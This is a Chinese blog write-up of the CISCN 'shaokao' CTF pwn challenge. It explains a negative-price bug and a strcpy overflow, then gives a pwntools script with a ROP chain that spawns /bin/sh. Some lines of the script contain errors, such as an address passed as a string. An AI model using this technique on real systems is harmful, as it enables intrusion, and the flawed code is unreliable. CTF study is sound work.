国赛初赛pwn

最新推荐文章于 2024-08-03 23:12:25 发布
最新推荐文章于 2024-08-03 23:12:25 发布
阅读量131 收藏
点赞数
文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/m0_75234353/article/details/131778473
版权

一.shaokao

1.checksec

2.ida

ida调试前看了眼程序,尝试买摊位,发现钱不够

 

点进去啤酒那里

 

发现这里的钱有漏洞,可以直接输入负数,钱不减反增。

 

又发现这里有strcpy函数,推测这里有溢出。

 

发现了系统调用函数

3.分析

 

那就是先买下摊位,再去改名,通过名字来溢出,实现系统调用。

先用ROPgaget来查找

4.exp.py

# _*_ coding:utf-8 _*_

from pwn import *

from struct import pack  

#p = remote("123.56.116.45","18860")

r= process("./shaokao")

context.log_level = "debug"

r.sendlineafter(">",b"1")

r.sendlineafter("3. 勇闯天涯\n",b"1")

r.sendlineafter("\n",b"-10000000")

r.sendlineafter(">",b"4")

r.sendlineafter(">",b"5")                                                                                                                                                                             

pay= b'a'*(0x20+8)

pay += pack('<Q','0x000000000040a67e') # pop rsi ; ret

pay += pack('<Q', 0x00000000004e60e0)

pay += pack('<Q', 0x0000000000458827) # pop rax ; ret

pay += '/bin//sh'

pay += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret

pay += pack('<Q', 0x000000000040a67e) # pop rsi ; ret

pay += pack('<Q', 0x00000000004e60e8)

pay += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret

pay += pack('<Q', 0x000000000045af95) # mov qword ptr [rsi], rax ; ret

pay += pack('<Q', 0x000000000040264f) # pop rdi ; ret

pay += pack('<Q', 0x00000000004e60e0)

pay += pack('<Q', 0x000000000040a67e) # pop rsi ; ret

pay += pack('<Q', 0x00000000004e60e8)

pay += pack('<Q', 0x00000000004a404b) # pop rdx ; pop rbx ; ret

pay += pack('<Q', 0x00000000004e60e8)

pay += pack('<Q', 0x4141414141414141)

pay += pack('<Q', 0x0000000000447339) # xor rax, rax ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000496710) # add rax, 1 ; ret

pay += pack('<Q', 0x0000000000402404) # syscall

r.sendlineafter("烧烤摊儿已归你所有,请赐名:",pay)

r.interactive()

wbxlzd
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 1
    评论
2024NKCTF-pwn
03-25
2024NKCTF_pwn
ciscn2018-pwn:2018大学生信息安全国赛pwn出题docker
05-11
Pwn Deployment cd deploy/ docker-compose up -d Flag //In Docker Container,xxxx代表新的flag echo xxxx > /home/ctf/flag Hint 计算器本身功能完善了吗? 关注协议本身 backdoor了解一下 Attachment calc.rar ...
welpwn pwn 入门题
02-11
pwn 入门题
PWN.rar_PWN
09-24
在IT领域,PWN(Payload Writing Notation)通常与安全竞赛和漏洞利用有关,尤其是在网络安全和逆向工程中。然而,这里的"pwn"似乎指的是一个特定的功能或项目,而不是通常的安全概念。从标题和描述来看,我们正在...
安恒ctf pwn课件
10-06
安恒培训资料 栈溢出指的是程序向栈中某个局部变量中写入的字节数超过了这个变量本身所申 请的字节数,因而导致与其相邻的栈中的变量的值被改变。 Ø 程序能够向栈上写入数据。 Ø 写入的数据大小没有被良好地控制。...
赛蓝企业管理系统 AuthToken/Index 身份认证绕过漏洞复现
0xSec
08-03 202
赛蓝企业管理系统 AuthToken/Index 接口存在身份认证绕过漏洞,未授权的远程攻击者可以利用此接口构造token绕过身份认证,使用超级管理员账户登录系统后台,造成信息泄露或者恶意破坏,使系统处于极不安全的状态。
内网安全:多种横向移动方式
最新发布
8888的博客
08-03 567
DCOM:DCOM(分布式组件对象模型)是微软的一系列概念和程序接口。它支持不同的两台机器上的组件间的通信,不论它们是运行在局域网、广域网、还是Internet上。利用这个接口,客户端程序对象能够向网络中另一台计算机上的服务器程序对象发送请求,使用DCOM进行横向移动的优势之一在于,在远程主机上执行的进程将会是托管COM服务器端的软件获取DCOM列表:实验前提:1.关闭防火墙2.必须有管理员权限。
科普文:Linux系统安全加固指南
为无为,事无事,味无味。
07-25 1658
本指南仅关注安全性和隐私性,而不关注性能,可用性或其他内容。列出的所有命令都将需要root特权。以“$”符号开头的单词表示一个变量,不同终端之间可能会有所不同。选择一个好的Linux发行版有很多因素。避免分发冻结程序包,因为它们在安全更新中通常很落后不使用与Systemd机制的发行版。Systemd包含许多不必要的攻击面;它尝试做的事情远远超出了必要,并且超出了初始化系统应做的事情。使用musl作为默认的C库。
【系统架构设计师】二十四、安全架构设计理论与实践①
帅次的博客
08-03 558
在信息系统的整个生命周期中,安全保障应包括技术、管理、人员和工程过程的整体安全,以及相关组织机构的健全等。目前,网络与信息安全风险类别可以分为人为蓄意破坏(被动型攻击,主动型攻击)、灾害性攻击、系统故障、人员无意识行为
SpringSecurity+Mysql数据库实现用户安全登录认证
不积跬步,无以至千里;不积小流,无以成江河。
08-03 1302
Spring Security 是一个提供身份认证、授权和防范常见攻击的安全权限框架。无论是对命令式,还是响应式web应用程序都完美支持,现在主要用作保护基于 Spring 框架的应用程序的事实标准。相对于shiro来说,SpringSecurity功能更加强大并且更加复杂 1.SpringBoot整合security pom中加入依赖 <!--security--> <dependency> <groupId>org.spri...
DLMS/COSEM中的信息安全:DLMS/COSEM安全概念(下)
huaqianzkh的专栏
08-03 495
定义了与加密转换有关的安全属性,并包括以下元素:——安全组件,确定可用的安全算法。——安全策略,在AA内对所有xDLMS APDU确定将应用的那种保护;——与给定的安全算法相关的安全资料,包含安全密钥、初始化向量、公共密钥证书等。由于安全资料是针对每个安全算法的,因此在相关条款中详细说明了这些要素。安全语境有“Security setup”对象管理,间GB/T 17215.662—2018。
安全基础学习-keil调试汇编代码
小夭的博客
07-31 785
初始目的是为了通过汇编编写CRC功能。但是基础为0,所以目前从搭建工程开始记录。大佬绕路。
读零信任网络:在不可信网络中构建安全系统07设备信任
lyingSeven的博客
08-03 367
设备安全
基于Python flask 的豆瓣电影top250数据评分可视化
08-03
基于Python flask 的豆瓣电影top250数据评分可视化
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
08-03
基于stm32的汇川伺服电机机械臂控制程序,C语言程序,串口通信
MQTTX-Setup-1.9.9-x64.exe
08-03
主要是MQTT的软件安装包
MES产品化-中央空调场内物流培训.pptx
08-03
MES产品化-中央空调场内物流培训.pptx
操作系统开发概念教程.md
08-03
操作系统开发是一个复杂的领域,涉及从底层硬件控制到高级用户接口的广泛内容。以下是一个操作系统开发的基础教程,涵盖从理论知识到实践步骤的主要内容。
220N-VB一款N+N-Channel沟道SOP8的MOSFET晶体管参数介绍与应用说明
08-03
220N-VB;Package:SOP8;Configuration:Dual-N+N-Channel;VDS:20V;VGS:12(±V);Vth:0.5~1.5V;RDS(ON)=26mΩ@VGS=4.5V;RDS(ON)=19mΩ@VGS=10V;ID:7.1A;Technology:Trench;
二进制利用入门:Pwn挑战解析
"Introduction-to-Pwn.pdf - pwn学习手册" 在网络安全领域,"pwn"是一种专门针对二进制漏洞利用的技术,它涉及到如何利用软件中的安全漏洞来控制或破坏系统。"Introduction to Pwn"这份手册是为那些对中级到高级的...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

wbxlzd

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值